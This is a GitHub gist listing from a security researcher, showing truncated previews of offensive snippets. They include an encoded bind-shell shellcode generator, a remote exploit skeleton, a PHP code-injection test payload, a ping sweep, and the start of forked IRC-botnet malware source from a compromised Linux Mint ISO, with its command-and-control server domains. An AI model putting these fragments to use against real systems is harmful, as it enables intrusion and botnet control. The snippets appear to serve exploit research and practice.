Skip to content

Instantly share code, notes, and snippets.

View thesp0nge's full-sized avatar
🏡
Working from home

Paolo Perego thesp0nge

🏡
Working from home
View GitHub Profile
@thesp0nge
thesp0nge / LICENSE
Last active August 21, 2019 11:01
A useless script to calculate the network address with the CIDR /xx notation in pure bash.
Copyright (c) 2019 - Paolo Perego - paolo@armoredcode.com
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
@thesp0nge
thesp0nge / generate.py
Created April 19, 2019 12:33
bind shell shellcode encoded with SUB EAX technique
#!/usr/bin/env python
# Please install shellerate>=0.4.2 before: pip install shellerate
import sys
import string
import logging
import secrets
from shellerate import strings;
from shellerate import asm_x86;
from shellerate.bind_shellcode import BindShellcode;
@thesp0nge
thesp0nge / remote_exploit_skeleton.py
Last active March 15, 2019 11:18
A Skeleton for my remote exploit stuff
#!/usr/bin/env python
import sys
import socket
def exploit(target, port):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
data=s.recv(1024)
#/usr/bin/env python
import socket
import os
import sys
import select
import string
import random
COMMANDS = ["STATS", "RTIME", "LTIME", "SRUN", "TRUN", "GMON", "GDOG", "KSTET", "GTER", "HTER", "LTER", "KSTAN"]
@thesp0nge
thesp0nge / get_cookie.js
Created October 6, 2017 08:47
Get Single Cookie function
#!/usr/bin/env python
import sys, socket, requests, urllib
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
uri="/index.php"
canary=urllib.urlencode({"page":"index');${print('THIS_IS_RANDOM_FOO')};#"})
#!/bin/sh
PING=`which ping`
SUBNET="192.168.10."
for i in `seq 254`; do $PING -c 1 -W 1 $SUBNET$i | grep 'from' | cut -d' ' -f 4 | tr -d ':'; done
#!/bin/sh
#for kali rolling, the startup script is very simple
cd /usr/share/zaproxy/
exec ./zap.sh $@
int test(char *s) {
printf("%s\n", s);
}
int main(int argc, char **argv) {
char *s;
test("pippo");
}
@thesp0nge
thesp0nge / man.cy
Created February 21, 2016 22:19 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",